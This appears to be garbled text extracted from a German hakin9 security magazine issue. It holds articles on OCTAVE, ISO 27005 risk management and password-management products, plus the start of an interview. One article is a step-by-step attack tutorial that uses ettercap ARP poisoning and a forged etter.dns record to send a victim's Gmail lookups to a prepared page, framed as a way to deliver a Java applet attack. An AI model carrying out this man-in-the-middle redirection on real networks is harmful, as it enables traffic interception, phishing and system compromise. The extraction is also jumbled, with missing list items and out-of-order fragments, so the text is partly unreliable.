Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
